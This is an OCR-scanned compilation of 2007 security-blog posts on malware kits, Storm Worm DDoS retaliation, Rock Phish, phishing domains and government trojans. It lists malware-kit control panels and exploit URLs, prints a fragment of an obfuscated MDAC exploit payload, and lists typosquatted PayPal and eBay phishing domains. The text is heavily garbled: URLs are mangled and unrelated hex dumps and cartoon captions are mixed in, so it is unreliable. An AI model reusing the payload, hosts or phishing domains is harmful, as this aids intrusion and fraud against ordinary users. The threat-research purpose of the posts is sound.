2. http://ddanchev.blo as pot.com/2007/08/storm-worms-use- 
of-dro p ped-domains.html 

3. http://ddanchev.blo as pot.com/2007/Q3/botnet- 
communication-platforms.html 

4. http://www.honevnet.or g/pa pers/ff/fast-flux.html 
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Examples of Search Engine Spam (2007-09-05 15:56) 

Perhaps I should say an example of a 50/50 black hat SEO, as 
Google's not listing the first, but has already crawled the 
second -cashhomes.info/content ; mydream- 
condos.info/content. While assesing the first link farm I 
found out that on average, 263 pages have exactly 6411 
outside links in them, 24.3 links per page. Pretty much the 
same case with the second one. Owning hundreds of domains 
like these and feeding them with garbage content in 
between syndicating 

ads can undermine a search engine's credibility if the black 
hat SEO operation starts appearing at the top results, and as 
we've already seen, both [l]black hat SEO and paid 
keywords advertising can lead to malware embedded sites. 


1. http://ddanchev.blo as pot.com/2007/Q4/malicious- 
ke vwords-advertisin a .html 
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Infecting Terrorist Suspects with Malware (2007-09- 
06 16:58) 

As we've already seen in the past, cyber jihadists, thus 
wannabe terrorists, use [l]commercial anti virus, [2]anti 

spyware and [3]anonymity software. Therefore, if law 
enforcement starts benchmarking its creations against the 

most popular anti virus software, and purchasing private 
malware crypters to obfuscate the binaries, who would 

security vendors be protecting you from - law enforcement, 
or Yuri and Andrei, the [4]fictional characters of two 

botnet masters? The practice is nothing new when it comes 
to intelligence gathering and the concept of [5]OSINT 

through malware for instance. What's new is its applicability 
to law enforcement, which [6]in a combination with 

bureaucracy could mean a law in a typical Chinese anti¬ 
censorship enforcement, that would oblige security vendors 

in the coutry to ignore the malware if they want to continue 
doing business there. Could we perhaps also witness 

a collective bargaining effort from security vendors not to do 
this, given [7]the interest of [8]using malware against 









[9] potential suspects, a largely open topic by itself? 

[10] Germany floats Trojan for terror suspects : 

" Would-be terrorists need only use Ubuntu Linux to avoid 
the ploy And even if they stuck with Windows their anti-virus 
software might detect the malware. Anti-virus firms that 
accede to law enforcement demands to turn a 

blind eye to state-sanctioned malware risk undermining trust 
in their software, as similar experience in the US has shown. 
Once the malware gets into circulation there's no guarantee 
it won't be turned against innocent users. The 

whole concept is loaded with irony. For one thing, German 
government computers, like those in the UK before them, 

are currently under targeted Trojan assault. 11 

[lljTargeted mailings to potential terrorists wouldn't work as 
effective as embedding IFRAMES within the 

[12]cyber jihadist communities, and in the future, we may 
also see anti-terrorist malware kits courtesy of an 

unknown government that's [13]purchasing or bidding for 
zero day browser vulnerabilities or anti virus software 

ones, in order to infect potential terrorists by bypassing their 
security solutions in place. 

1. http://ddanchev.blo as pot.com/2007/Q3/ i ihadists-usin a- 
kasperskv-anfi-virus.html 

2. http://ddanchev.blo as pot.com/2007/Q8/534-bio ara phies- 
of-i ihadist-fi a hters.html 

3. http://ddanchev.blo as pot.com/2007/Q7/cvber- i ihadists- 
and-tor.html 


















4. http://ddanchev.stri pa enerator.com/2007/09/Q2/all- 
warfare-is-based-on-deception.html 

5. http://ddanchev.blo as pot.com/2007/Q4/osint-throu ah- 
botnets.html 

6. http://ddanchev.blo as pot.com/2007/Q7/insecure- 
bureaucracv-in- a ermanv.html 

7. http://news.zdnet.com/2100-10Q9 22-6197020.html 

8 . 

http://www.wired.com/oolitics/law/news/2007/07/fbi_s p vware 

9. http://blo a .wired.com/defense/2007/07/fbi-s p vware- 
rev.html 

10 . 

http://www.there a ister.co.uk/2007/09/03/ a erman tro i an plan 

L 

11. http://arstechnica.com/news.ars/post/200709Q3- 
a ermanv-to- i oin-us-in-usin a- ooliceware-for-esoiona a e-invest 

ia ations.html 

12. http://ddanchev.blo as pot.com/2007/Q8/analvses-of- 
c vber- i ihadist-forums-and.html 

13. http://ddanchev.blo as pot.com/2007/Q7/zero-da v- 
vulnerabilities-auction.html 
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Popular Web Malware Exploitation Techniques (2007- 
09-10 14:30) 

Who needs zero day vulnerabilities to achieve a widescale 
malware infection these days? Obviously the lack of this 

popular in the past prerequisite for a successful client side 
vulnerability exploitation, is no longer needed, but how 
come? Rather simple and that's the disturbing part - 
malicious parties stopped falling victims into the common 

perception that the end user is so fully patched, that zero 
day vulnerabilities are needed to break thought his thought 
to be complex use of security measures, instead, whether an 
event-study or plain simple common sense on their 

part, they've realized that an unpatched and obfuscated 
vulnerability is just as dangerous as a zero day, and the 

results have been evident ever since. 

































Going through [l]the screenshots of the [2]infected 
population of a certain [3]malware kit, you [4]can clearly 

see the diversity of the outdated vulnerabilities used. Multi¬ 
browser vulnerabilities [5]IFRAME-ed all-in-one to achive the 
highest possible efficiency rate as there's a slight chance a 
visitor will return to a site they've managed to embedd the 
malware at, twice. The success of the these kits therefore has 
nothing to do with malicious innovations, but 

rather [6]a successful tactical warfare against reactive 
security response. If perimeter defense cannot be breached, 

it will get either ignored or bypassed, precisely why client 
side vulnerabilities are back in the game with full speed. 

Evidence showcasing this KISS (Keep it Simple 
Stupid) principle : 

- IcePack, MPack, WebAttacker, the Nuclear Malware Kit, and 
pretty much every popular malware kit is taking 

advantage of outdated vulnerabilities, whether obfuscated or 
not depends on the pack's version and the malicious 

party's understanding of the concept 

- [7]The Massive Embedded Web Attack in Italy was using 
MPack's outdated arsenal of obfuscated vulnerabili¬ 
ties and despite that it achieved its objectives and infected 
thousands of hosts 

- The recent [8]Bank of India breach was using a modified 
version of the popular malware kits mentioned 

above, in between syndicating the hack with another 
campaign using a multi-IFRAME-ing techniques, again taking 



advantage of outdated vulnerabilities 
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- [9]Storm Worm's success is [10]mostly due to the fact that 
the end user is still living in the "malicious attachment" 
world, and so outdated vulnerabilities are again successfully 
used again her 

Exploit Prevention Labs's recent stats on [ll]common 
vulnerabilities used as an infection vector can come 

very handy in terms of demonstrating the mass use of these 
malware kits. The bottom line is that their modularity 

combined with features and add-ons for them available 
either though a purchase or on demand, is an emerging 

trend by itself, one whether you cannot tell is it a script 
kiddie or sophisticated malicious party you're dealing with. 

And even if it's the second, [12]the KISS principle has its own 
ugly applicability in the malware world. 

1. http://ddanchev.blo as oot.com/2QQ7/Q8/nuclear-malware- 
kit.html 

2. http://ddanchev.blo as pot.com/2QQ6/ll/nuclear- a rabber- 
toolkit.html 

3. http://ddanchev.blo as pot.com/2007/Q7/icepack-malware- 
kit-in-action.html 

4. http://ddanchev.blo as pot.com/2007/Q5/webattacker-in- 
action.html 

5. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 




















6. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-increasin a .html 


7. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in-italv.html 

8. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

9. http://ddanchev.blo as pot.com/2007/Q8/storm-worm- 
malware-back-in- a ame.html 

10. http://ddanchev.blo as pot.com/2007/Q8/offensive-storm- 
worm-obfuscation.html 


11. http://www.exolabs.com/ss/threatCenter_ prevalence .as p 

12. http://en.wikioedia.or g /wiki/KISS principle 
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Google Hacking for MPacks, Zunkers and 
WebAttackers (2007-09-10 15:49) 

If wannabe botnet masters really wanted to hide their 
activities online, they would have blocked Google's crawlers 

from indexing their default malware kit installations, and 
changed the default installation settings to random directory 





































and filename, wouldn't they? Apparently, a default deny:all 
rule for anyone but the botnet masters doesn't exist as 

a principle among botnet amateurs, which leaves us with lots 
of malware campaigns to assess and shut down. 

The following are IPs and domain names currently or 
historically used to host [l]MPack, [2] Web Attacker and 

[3]Zunker control panels, as well as live exploit URLs within 
the packs. Some are down, others are still accessible, the rest 
are publicly cached. If index.php doesn't exist, admin.php or 
zu.php act as the default admin panel. 

MPack Malware Campaigns : 

wmigra.org/mpack/index.php 
64.62.137.149/ edit/ 

81.95.145.240/logo/ 

81.95.150.42/MPack091cbt/index.php 

brbody.info/mpack/index.php 

innaidina.info/mpack/index.php 

rallyesimages.ch/liens/test/ 

sol.hl8.ru/mpack/index.php 

81.95.145.240/logo/ 

icqmir.iplot.ru/mpack/index.php 

cordon.ru/mp/ 

havephun.org/mpack/index.php 



xbr.ru/images/old/mpack/index.php 

evil-x.org/spk2/ 

tyt-menia.net/mpack/index.php 

rufat.info/mpack/index.php 

iwiw-hosting.com/upload/ 

stepbystepbg.org/img/ 

mydulichusa.com/mpack/index.php 

csextra.wz.cz/weapons/mpack/index.php 

d34thnation.com/mpack/index.php 

mp3fans.org/mpack084/ 

innaidina.info/mpack/ 

WebAttacker's Hosts : 

secondsite2.com/cgi-bin/ie0604.cgi 
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lsdman.info/cgi-bin/ie0604.cgi?bug = MS05-001 &SP1 
telecarrier.es/cgi-bin/ie0604.cgi 
stmare.info/cgi-bin/ie0604.cgi 
redcrossonline.cn/cgi-bin/ie0604.cgi 

Zunker's C &C : 


66.148.74.7/zu/ 



bundeswehrzentrale.org 

skilltests.org/zu/zc.php 

zup.secondsitel.com/zu/index.php 

statl.realstatscollect.com/zu/ 

webcounterstat.info/zu/ 

I also find it very interesting to see [4]VeriSign publicly 
admitting of hacking into the hosts behind the mal¬ 
ware kits - the Russian Business Network in this case - to 
assess the damages done in the form of number of infected 

PCs and with what exactly : 

II When VeriSign managed to hack into the RBN computer 
running the scam, it found accumulated data repre¬ 
senting 30,000 such infections. "Every major trojan in the 
last year links to RBN" says a VeriSign sleuth. 11 

Unethical penetration testing of malicious hosts to assess the 
damages by the malware campaign in question 

wouldn't result in the malware authors striking back with 
legal complaints, instead, they'll forward some DDoS 

bandwidth back at the investigating IPs, a consequence I'm 
sure researchers reading here have experienced before. 

On the other hand, the RBN themselves are getting more 
malicious with every new campaign, just consider for 

instance that Russian Business Network's IPs were behind the 
[5]Massive Embedded Web Attack in Italy that took 



place in June, 2007, and the most recent [6]Bank of India 
breach as well. 

1. 

http://blo as. pandasoftware.com/blo a s/ima a es/PandaLabs/20 
07/05/11/M Pack, pdf 

2. http://ddanchev.blo as pot.com/2007/Q5/webattacker-in- 
action.html 

3. 

http://blo as. pandasoftware.com/blo as/ pandalabs/archive/200 

7/05/08/Zunker.as px 

4. 

http://www.economist.com/dailv/columns/europeview/displa v 
storv.cfm?stor y id=9723768 

5. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in-italv.html 

6. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 
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I'm so proud of Jimmy. 
Apparently he's one o( 
the world's best at a new 
computer game. 


Something called 
“DDOS Attack" 


MOM 


The Joy of Terll 


In Nilm/ai & 


joyoftoch.coi 


Storm Worm's DDoS Attitude (2007-09-11 16:10) 


Stage one - infect as many end users with high speed 
Internet access as possible through [l]the use of client side 

vulnerabilities. Stage two - ensure the longest possible 
lifecycle for the malware campaign by having the newly 

released binaries hosted at the infected PCs themselves. 
Stage three - take advantage of [2]fast-flux networks to 

make it harder to shut down the entire botnet. And stage fou 
- [3]strike back at any security researcher or vendor 

playing around with Storm Worm's fast-flux network or 
somehow messing up with the [4]malicious economies of 

scale on a worldwide basis. On Friday I received an email 
from Susan Williams at [5]aa419.org, and as it looks like 

















several [6]other anti-fraud sites are getting DDoS-ed too : 

11 On September 2 2007 , online scammers began an 
automated DDoS attack against aa419.org, with the goal 

of shutting down the anti-fraud site. For some time, aa419 
was able to filter the worldwide botnet's attacks by 

monitoring connections and only allowing legitimate visitors 
to access thesite. However, by September 5 the hoster was 
being overwhelmed with nearly 400 GB of incoming requests 
every hour. Rather than let their infrastructure 

melt under the onslaught, the server is currently offline. This 
massive distributed denial of service (DDoS) attack was 
inspired by aa419.org's mission to blacklist and shut down 
scam web sites. Since 2004, the all-volunteer organization 
has recorded more than 18,000 such sites. In addition to 
publicly warning potential victims of fraud, they work with 
hosters and registrars to take scam web sites offline quickly, 
with a success rate of over 97 % shut down. Susan 

Williams, press officer for aa419.org, said, "On the whole, 
we're positive about this. Not that we enjoy being offline; 
quite the opposite. But being attacked with a botnet of this 
magnitude tells us that we are doing serious damage to the 
organized crime networks that run these scams." Internet 
crime is increasing at record rates, and aa419.org is at the 
forefront of the fight against it. "We will continue our work 
regardless of how many criminals are annoyed by it," 

Williams said. " 

Castlecops [7]comments on the DDoS taking place at the site 
too : 



11 This newest ddos round started about a week ago and 
knocked us offline for a couple hours while we figured 
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out what was going on. And we're still under attack, so if the 
site is a bit slower, you know why. Odd month really, lots of 
sites, lots of sites, are under ddos. We've got over 10k bots 
attacking us with more being added daily. " 

As a friend recently pointed out - you ain't making a 
difference until you start getting DDoS-ed. 

Cartoon courtesy of [8]Joyoftech.com, here're [9]more 
courtesy of myself. 

Related posts: 

[10] The War against botnets and DDoS attacks 

[11] Emerging DDoS Attack Trends 

[12] DDoS On Demand vs DDoS Extortion 

1. http://ddanchev.blo as oot.com/2QQ7/09/ DO Pular-web- 
malware-exploitafion.html 

2. http://ddanchev.blo as pot.com/20Q7/Q9/storm-worms-fast- 
flux-networks.html 

3. http://www.diso a .or a /2007/Q9/o p ps- a uess-i-pissed-off- 
storm.html 

4. http://ddanchev.blo as pot.com/20Q7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 


5. http://aa419.or a/ 























6. http://it.slashdot.or g /article.Dl7sid = 07/09/08/1251238 


7. http://www.castlecoos.com/a6822- 

Not unexoocted hut were st.li under_attack.html 

8. http://www. io voftech.com/ 

9. http://ddanchev.stri pg enerator.com/ 

10. http://ddanchev.blo os pot.com/2006/Q2/war-a o ainst- 
botnets-and-ddos-attacks.html 


11. http://ddanchev.blo os pot.com/2007/Q2/emer oing -ddos- 
attack-trends.html 


12. http://ddanchev.blo os pot.com/2007/Q5/ddos-on-demand- 
vs-ddos-extortion.html 
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209 Host Locked (2007-09-12 13:37) 


Ever came across this fake error message? A "209 Host 
Locked" message on a fraudulent domain is the default 

indication that you're on a Rock Phish domain, that is a 
single domain hosting multiple phishing campaigns aimed at 

different financial institutions. And as more Royal Bank of 
Scotland phishing emails are cirtulating in the wild, these 

































very same emails pointed me to a Chinese Rock Phish 
campaign which was shut down as of yesterday. What is 
different in this campaign, compared to [l]the previous one? 
The phishers put more efforts into ensuring the phishing 
email 

gets through spam filters by using spacing, adding _ in front 
of random words, as well as the usual garbage content at the 
end of the email. All the URLs within the campaign are 
already in the [2]Phishtank, [3]DSLreports.corn's wisdom 

of the [4]anti-phishers crowd continues exposing Rock Phish 
domains on a daily basis, an effort worth keeping track of. 

The Rock Phish Kit is the logical evolution from [5]DIY 
phishing kits like the one I've [6]already blogged about, 

however, both concepts are not mutually exclusive but 
apparently tend to work together. The DIY phishing kits on 

their part are largely used in the planning stage of the 
phishing campaign, that is, fake sites get generated and the 

data obtained forwarded to a single place, which is where 
Rock Phish starts getting used, namely, in the execution 
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stage, where all the phishing pages generated get hosted on 
a single domain. Phishing efficiency vs [7]Rock Phish's 
weakness due to centralization of numerous campaigns on a 
single domain - it's the phishers' trade-off. Within [8]the 

phishing ecosystem, there's are numerous approaches 
phishers tend to use to achieve maximum efficiency, ones 
I've 



already discussed in a previous post. The most prolific 
problem to me remains phishing 1.0's "push" model that is 
still remarkably successful compared to the [9]more 
advanced man in the middle phishing attacks and 
[10]pharming. 

From my perspective, if a financial institution really wants to 
protect its customers from phishing scams, it would 

first segment the threat, evaluate its customer's perception 
of it and current level of awareness, and then start an 

educational campaign aiming to not teach them how to 
recognize whether a site is a phish or not, but how to report 

and ignore the "push" models emails that arrive in their 
mailboxes. From another rather pragmatic perspective, 
phishers don't just load images for their phish emails from 
the company's website, but also the majority of phishing 

emails redirect to the real web site after the data was 
submitted - an early warning system by itself. 

1. http://ddanchev.blo as pot.com/2007/Q7/confirm-vour- 
a ullibiHitv.html 

2. http://www.phishtank.com/ 

3. http://www.dslreports.com/forum/rl8762644-Rock-phish- 
information-continued-start=20 

4. http://www.dslreports.com/forum/rl8762644-Rock-phish- 
i nformation-continued-start=40 

5. http://ddanchev.blo as pot.com/2007/Q8/di v- phishin a- 
kits.html 





















6. http://ddanchev.blo as pot.com/2007/Q8/di v- phishin a- 
kits 29.html 


7. http://ddanchev.blo as pot.com/2007/Q7/avera a e-online- 
time-for-phishin a -sites.html 

8. http://ddanchev.blo as pot.com/2007/08/econonnics-of- 
phishin a .html 

9. http://ddanchev.blo as pot.com/2007/08/pharmin a -attacks- 
throu a h-dns-cache.html 

10. http://ddanchev.blo as pot.com/2007/08/di v- oharmin a- 
tools.html 
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function makePayload() 

K 

var mdacPay = new Array( 
String. fromCharCode( 123,66, 
String. f romCharCode( 123,66, 
Str Ing, f romCharCode( 123,65, 
String. f romCharCode( 123,48, 
String.fromCharCode(123,48, 
String. fromCharCode( 123,54, 
String. fromChar Code( 123,54, 
String, f romCharCode(123,55, 
String, f romCharCode( 123,48, 
String. f romCharCode( 123,54, 
String. fromCharCode(123,66, 
String. f romCharCode( 123,68, 
String, fromCharCode(l 23,69, 
String. fromCharCodet123,66, 
return mdacPay; 


68,57,54,67,S3,S3,54,'45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,48,125), 

68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.125) , 

66.57.66.67.69.68.68.45.69.67.55.69.45.52.55.69.49.45.57.51.50.50.45.68.52.65.50.49.48.54.49.55.49.49.54.125) , 

48.48.54.70.48.51.51.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.125) , 

48.48.54.70.48.51.65.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.125) , 
101,51,50,48,55,48,97,45,55,54,54,100,45,52,101,101,54,45,56,55,57,99,45,100,99,49,102,97,57,49,100,50,102,99 

52.49.52.53.49.50.66.45.66.57.55.56.45.52.53.49.68.45.65.48.68.56.45.70.67.70.68.70.51.51.69.56.51.51.67.125) , 

70.53.66.55.70.54.51.45.70.48.54.70.45.52.51.51.49.45.56.65.50.54.45.51.51.57.69.48.51.67.48.65.69.51.68.125) . 

54.55.50.51.69.48.57.45.70.52.67.50.45.52.51.99.56.45.56.51.53.56.45.48.57.70.67.68.49.68.66.48.55.54.54.125) , 

51.57.70.55.50.53.70.45.49.66.50.68.45.52.56.51.49.45.65.57.70.68.45.56.55.52.56.52.55.54.56.50.48.49.48.125) , 

65.48.49.56.53.57.57.45.49.68.66.51.45.52.52.102.57.45.56.51.66.52.45.52.54.49.52.53.52.67.56.52.66.70.56.125) 

48.67.48.55.68.53.54.45.55.67.54.57.45.52.51.70.49.45.66.52.65.48.45.50.53.70.53.65.49.49.70.65.66.49.57.125) , 

56.67.67.67.68.68.70.45.67.65.50.56.45.52.57.54.98.45.66.48.53.48.45.54.67.48.55.67.57.54.50.52.55.54.66.125) , 

68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.48.125) ,! 




































U.S Consulate St. Petersburg Serving Malware (2007- 
09-14 17:08) 

If that's not a pattern and good timing, it's a malicious 
anomaly. On the 31 of August, 2007, [l]Bank of India was 

serving malware courtesy of the Russian Business Network. 

[2]This week, evidence that the [3]U.S Consulate in St. 

Petersburg, Russia was [4]serving malware to [5]its visitors 
proved [6]to be true. The web site is now clean, but 

assessing the IFRAME-ed URLs used in the attack is possible 
as they're still reachable. It's still unknown for long the 
IFRAMEs remain embedded at the Consulate's web site, as 
well as when were they cleaned, but the attack was 

still active on the 2nd of September, 2007, just two 
days after Bank of India's malware attack. It's also 
worth mentioning that compared [7]to the most recent 
[8]malware embedded attacks which had the IFRAMEs 
directly 

embedded within, in this one the IFRAME itself is obfuscated 
but the live exploit URL isn't. 

Tipped by a third-party, Sophos managed to locate the exact 
URL by deobfuscating the rather simple URL obfuscation, 

and [9]Fraser Howard posted some interesting details at their 
blog : 

11 The purpose of the attacks is to infect victims with Trojans 
from the two attack sites. As discussed in a 

recent paper, the increased use of automation to continually 
re-encrypt/pack/obfuscate the Trojans highlights the need for 
good generic detection technology A system to continuously 



monitor these files in order to maintain detection is essential. 
So, to answer the question of whether the U.S. Consulate 
General site was specifically targeted in this attack 

- my answer is no, probably not. The prevalence of other 
much smaller sites compromised in exactly the same way 

(in just seven days worth of data) suggests that the hackers 
just happened to have caught a big fish as they trawled for 
vulnerable servers. It just goes to show that security is 
important on all machines hosting both small and large 
websites. 11 
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We could greatly expand those as a matter of fact. The 
IFRAME used leads us to 

verymonkey.com/goof/index.php (209.123.181.185) and 
verymonkey.com/test/index.php which is exploiting a 
modified MDAC, and aims to execute 

the following binary Virus.Win32.Zapchast.DA : 

Detection rate : Result: 6/32 (18.75 %) 

AntiVir 2007.09.14 DR/Delphi.Gen 

AVG 2007.09.14 Obfustat.NPJ 

eSafe 2007.09.13 Suspicious Trojan/Worm 

Ikarus 2007.09.14 Virus.Win32.Zapchast.DA 

VirusBuster 2007.09.13 Trojan.Agent.JVF 

Webwasher-Gateway 2007.09.14 Trojan.Delphi.Gen 

File size: 28672 bytes 



MD5: a25ad0045dl95016690b299bfb8b75dl 


SHA1: ab219c50b0adc84f702c696797e81411b6eab596 

Is this obfuscated IFRAME-ing a fad or a trend? I think it's a 
trend since IFRAME-ing to a secondary domain taking 

advantage of [10]popular web malware exploitation 
techniques is already rated as suspicious by security 
vendors, and 

Google themselves warning you that "this site may harm 
your computer", and so they ought to win time. Moreover, 
such obfuscations are making it harder to assess how many 
sites and which ones exactly were victims of the attack 

in an OSINT manner. It gets even more interesting, the IP 
hosting verymonkey.com was [ll]historically used to host 

banksoffscotland.co.uk scam web site in March this year. In 
case you wonder, it's not the RBN that's behind this 

[12]malware embedded attack, but let's say it's a subsidiary 
of the RBN. 

1. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

2. http:// a overnment.zdnet.com/?p=3402 

3. 

http://weblo a .infoworld.com/zerodav/archives/2007/09/russia 
n hackers.html 

4. 

http://www.there a ister.co.uk/2007/09/13/us consulate tro i an 

L 














5. http://www.scma a azineus.com/US-Consulate-in-St- 
Petersbur a -hacked/article/35644/ 

6. http://www. a ovtech.com/ a t/14343l?tooic=117671 

7. http://ddanchev.blo as pot.com/2007/Q8/massive-online- 
a ames-malware-attack.html 

8. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in-italv.html 

9. http://www.sophos.com/securitv/blo a /2007/09/580.html 

10. http://ddanchev.blo as pot.com/2007/Q9/ po pular-web- 
malware-exoloitation.html 

11. http://edinbur a hnews.scotsman.com/index.cfm? 
id=402192007 


12. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-increasin a .html 
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002A 61 62 63 64 65 66 abedef 

0030 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 00 00 84 a2 ghijklranopqr 

0040 d4 00 7c a2 d4 00 4c a2 d4 00 . | I. 


Storm Worm's DDoS Attitude - Part Two (2007-09-17 
11:26) 

After commenting on Storm Worm's logical connection with 
the [l]recent DDoS attacks against anti-scam web 

sites, SecureWorks timely released details of what actions 
could [2]trigger a DDoS attack from Storm back at the 

researcher's host and what type of DDoS attacks are 
launched exactly : 

































11 The attacks do show signs of being automated. 

Certain actions reliably trigger attacks. 

Investigators who 

can withstand the onslaught and have decided to test their 
theories (with cooperation from their ISPs, of course) 

can reliably trigger DDoS attacks on themselves. In one case, 
probing more than four unique Peacomm botnet HTTP 

proxies within ten seconds results in a flood of TCP SYN and 
ICMP packets, which last for about two hours. That's all fairly 
regular. " 

To me, this tactic is more of a "hey our situational awareness 
on your actions to shut us down is fairly food 

enough" type of statement, but why would the botnet 
masters risk exposing infected hosts compared to the 

opportunity to have them act like nothing's in fact wrong 
with them? Mainly because if infected hosts were a scarce 

resource perhaps they would, but in Storm Worm's case 
[3]the oversupply of infected hosts is allowing them to 

dedicate resources for automatic self-defensive DDoS. 

1. http://ddanchev.blo as oot.com/2QQ7/09/storm-worms-ddos- 
attitude.html 

2 . 

http://www.secureworks.eom/research/blo a /index. ph p/2007/0 
9/12/anal vsis-of-storm-worm-ddos-traffic/ 


3. http://blo a s.zdnet.com/securit v/? p=493 
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Phishing Reports Received June '06 - June '07 

35300 



PayPal and Ebay Phishing Domains (2007-09-17 
14:10) 

As I needed another benchmark for a creative typosquatting 
next to my best finding of this [l]World of Warcraft 

domain scam, I stumbled upon the following list of domains, 
where the most creative domain squatting is done 

solely for the purpose of including the domains within a 
typical phishing scam URL structure. Some of the domains 

are actual [2]Rock Phish ones that are currently hosting live 
phishing campaigns : 

paypal-online-account.com 

paypal-user-update.com 

paypal-supportl.com 

paypal-account-protection.com 

paypall-login.com 







































paypal-accounts-update.com 

Some "creative" ones to be abused : 

paypal-aspx.com 

paypal-cgi3.info 

paypal-cmd.com 

paypal-comlwebscrc-login-run.com 

paypal-confirmation-id-0746795.com 

And since [3]PayPal is actually EBay after the acqusition, 
here're some "creative" Ebay domain scams as well 


ebay-com-isapidll.com 

ebayisapidll-cgi.com 

ebayisapidllaw2.com 

ebayisapidllu.com 

[^Authentication itself seems to be a priority as the 
customer must possess a tangible proof that her transac¬ 
tions' security is somehow enhanced by a layered 
authentication, no doubt about it. But with phishers actively 
using 

a "push" model that is starting to visually social engineer the 
customers by registering domains imitating PayPal and 
EBay's web application structure, authentication itself 
shouldn't be a priority number one the way it is for the time 
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being as phishers are not even trying to bypass it. 

Stats courtesy of the [5]Anti-Phishing Working Group. 

1. http://ddanchev.blo as DOt.com/2007/07/world-of-warcraft- 
domain-scam.html 

2. http://ddanchev.blo as pot.com/2007/09/2Q9-host- 
locked.html 

3. http://news.com.com/2100-1017-941964.html 

4. http://ddanchev.blo as pot.com/2007/Q8/ pav pals-securit v- 
ke v.html 

5. http://www.antiphishin a .or a/ 
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A Chinese Malware Downloader in the Wild (2007-09- 
17 18:11) 

This is an example of a recently released in the wild DIY 
downloader with rather average features such as the ability 
for the malware author to choose multiple locations of the 
files to be "dropped", as well as the time interval to check for 
the newly distributed binaries. The high detection rate of the 
downloader itself - Result: 23/32 (71.88 %) - is not the main 
point I'd like to emphasize on, but rather that compared to 
the majority of [ljdownloaders courtesy of Russian 

malware authors I come across to occasionally, this is a 
Chinese one. China is often blamed to be [2]the country 





































hosting the highest percentage of malware in the world, 
however, China is also the country with highest percentage 

of infected PCs, and as we've seen with Storm Worm an 
infected host starts acting as both infection and propagation 

vector for the malware in question. As in any other local 
malware market, DIY tools get released so that script kiddies 
can generate enough noise to keep the [3]more 
sophisticated malware campaigns running behind the 
curtains. 

1. http://seclists.or g /fulldisclosure/2007/Au a /0411.html 

2 . 

http://news.com.com/Ch ina + hosts+nearlv+half+of+al I+ mal 
ware+sites/2100-7349 3-6205896.html 

3. http://ddanchev.blo as pot.com/2007/Q9/storm-worms-fast- 
f1ux-networks.html 
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Two Cyber Jihadist Blogs Now Offline (2007-09-19 
14:33) 

[ 1 ]Jihad Fields are Calling and [2]The Ignored Puzzle of 
Knowledge are down, apparently the authors themselves de¬ 
cided to delete them [3]compared to Wordpress [4]shutting 
down the [5]Global Islamic Media Front like it happened 

before. Ensuring that these "tip of the iceberg" [6]cyber 
jihadist communities stay offline has a long-term [7]PSYOPS 

















effect on future wannabe cyber jihadists wanting to operate 
such communities, ones where talkers eventually turn 

into doers. 

1. http://mu i ahidfisabeelililah.wordDress.com/ 

2. http://inshallahshaheed.wordpress.com/ 

3. http://ddanchev.blo as pot.com/2007/07/ a imf-switchm a- 
blo a s.html 

4. http://ddanchev.blo as pot.com/2007/Q8/ a imf-now- 
permanentlv-shut-down.html 

5. http://ddanchev.blo as pot.com/2007/Q8/ a imf-we-will- 
remain.html 

6. http://ddanchev.blo as pot.com/2007/08/analvses-of-cvber- 
i ihadist-forums-and.html 

7. http://ddanchev.blo as pot.com/2006/Q9/internet- psvops- 
ps vcholo a ical.html 
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Custom DDoS Capabilities Within a Malware (2007- 
09-19 16:02) 


DDoS capabilities within a malware are nothing new and are 
in fact becoming a commodity feature, but compared 

to the [l]average DDoS-ers with up to two different DoS 
attack approaches, or the types of malware with hardcoded 

IPs to be attacked, there's a disturbing trend to diversify the 
DoS techniques used as much as possible to improve the 
chances of a successful attack, let's not mention the 
[2]allocation of automatic self-defensive DDoS back at 
curious 


parties due to the oversupply of infected hosts. As you can 
see in this particular malware - high detection rate - the 










































































DDoS variables within are not only diverse enough to cause a 
lot of damage, but also, simultaneous combinations 

are also possible. 
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Now comes the digitally ugly part. [3]Open source malware 
results in many different variants with a huge variety 




















of new modules and options implemented within, even 
worse, the software client can indeed mature into a web 

based malware C &C like the ones we've been seeing since 
the beginning of 2007. And this is exactly what happened 

with this open source malware - a Chinese hacking team is 
currently offering a Web builder for sale, making it possi¬ 
ble to integrate the malware on the Web in a typical do-it- 
yourself fashion. What types of attacks are included anyway : 

- ICMP/SYN/TCP and UDP flooding 

- HTTP no-cache, GET flooding 

- CC variety 

- GAME, CIDR, Hybrid flooding capabilities 
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[4]The Black Sun bot, [5]the Cyber bot, [6]MPack, [7]lcePack, 
[8]WebAttacker, the [9]Nuclear Malware Kit and 

[10]Zunker, are all Web based malware platforms and were 
originally released as such compared to the Web adaption 

of this one. 

1. http://ddanchev.blo as Dot.com/2007/Q8/cvber- i ihadist-dos- 
tool.html 


2. http://ddanchev.blo as pot.com/2007/Q9/storm-worms-ddos- 
attitude-part-two.html 











3. 

http://www.packetstormsecuritv.or a/pa pers/ a eneral/malware- 

trends.pdf 

4. http://ddanchev.blo as pot.com/2007/04/shots-from- 
malicious-wild-west-sample_7672.html 

5. http://ddanchev.blo as pot.com/2007/04/shots-from- 
malicious-wild-west-sample 20.html 

6. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in-italv.html 

7. http://ddanchev.blo as pot.com/2007/Q7/icepack-malware- 
kit-in-action.html 


8. http://ddanchev.blo as pot.com/2007/Q5/webattacker-in- 
action.html 


